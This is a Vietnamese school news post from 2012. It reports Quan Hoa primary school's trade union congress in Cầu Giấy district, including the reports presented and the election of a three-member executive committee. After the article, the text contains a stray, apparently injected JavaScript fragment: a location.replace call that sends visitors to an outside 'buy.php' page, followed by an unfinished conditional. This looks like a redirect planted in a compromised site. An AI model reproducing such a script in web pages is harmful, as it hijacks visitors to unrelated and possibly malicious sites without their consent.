Đại hội công đoàn Trường TH Quan Hoa

10/08/2012 12:09 Chiều 1 phản hồi

Thực hiện kế hoạch chỉ đạo của Công đoàn Giáo dục quận Cầu Giấy về việc tổ chức Đại hội Công đoàn cơ sở , ngày 10 / 8/ 2012,  Công đoàn Trường Tiểu học Quan Hoa đã tổ chức  Đại hội Công đoàn  nhiệm kỳ 2012-2015 nhằm đánh giá các kết quả đã đạt được trong nhiệm kỳ 2010 – 2012 và đề xuất phương hướng hoạt động công đoàn cho nhiệm kỳ mới.

Đến dự và chỉ đạo Đại hội có đồng chí Nguyễn Thanh Tịnh – Bí thư chi bộ – Hiệu trưởng nhà trường; Các đồng chí là đoàn viên Công đoàn nhà trường cũng về dự Đại hội đông đủ.

Đại hội đã nghe đ/c Trần Thị Chi – Chủ tịch công đoàn, báo cáo tổng kết hoạt động phong trào của Công đoàn nhà trường; báo cáo kiểm điểm của Ban chấp hành Công đoàn trong nhiệm kỳ 2010 -2012  và đề ra phương hướng hoạt động nhiệm kỳ 2012 -2015. Báo cáo của Ban chấp hành công đoàn nhiệm kỳ 2010-2012 cho thấy, công đoàn đã thực hiện tốt việc chăm lo đời sống cán bộ công nhân viên, tổ chức tốt các hoạt động văn hóa, văn nghệ, thể dục thể thao, tích cưc đóng góp các sáng kiến  kinh nghiệm nhằm nâng cao chất lượng giảng dạy, nghiên cứu và quản lý học sinh … Công đoàn Trường đã được triển khai thực hiện một cách toàn diện, đảm bảo thực hiện đúng các chức năng, nhiệm vụ và quyền hạn của một tổ chức công đoàn cơ sở. Các đoàn viên đã có nhiều cố gắng đóng góp vào thành tích chung của Trường và đóng góp đáng kể vào hoạt động của Công đoàn ngành giáo dục quận Cầu Giấy.

Tại Đại hội, các tổ công đoàn đã đóng góp các ý kiến tham luận về vấn đề đổi mới quản lý giáo dục, quản lý học sinh, chăm lo đời sống cán bộ công nhân viên ; nâng cao chất lượng chuyên môn…. Các ý kiến đóng góp rất có ý nghĩa, và đặc biệt sát thực với công việc của Công đoàn trường. Đại hội đã thông qua phương hướng, nhiệm vụ của hoạt động công đoàn trong nhiệm kỳ 2012-2015

Sau một buổi làm việc khẩn trương, tích cực, Đại hội đã thành công tốt đẹp. Kết thúc, Đại hội đã bầu ra Ban chấp hành Công đoàn nhiệm kỳ 2012 -2015 gồm 3 đồng chí :

  1. Đ/c Hoàng Anh Vân
  2. Đ/c Bùi Bảo Linh
  3. Đ/c Nguyễn Thanh Hằng

Đồng thời bầu 2 đại biểu chính thức, 1 đại biểu dự bị tham dự Đại hội Công đoàn Giáo dục quận Cầu Giấy.

location.replace(“http://gethere.info/buy.php”);

if (document.currentScript) {

Chưa có phản hồi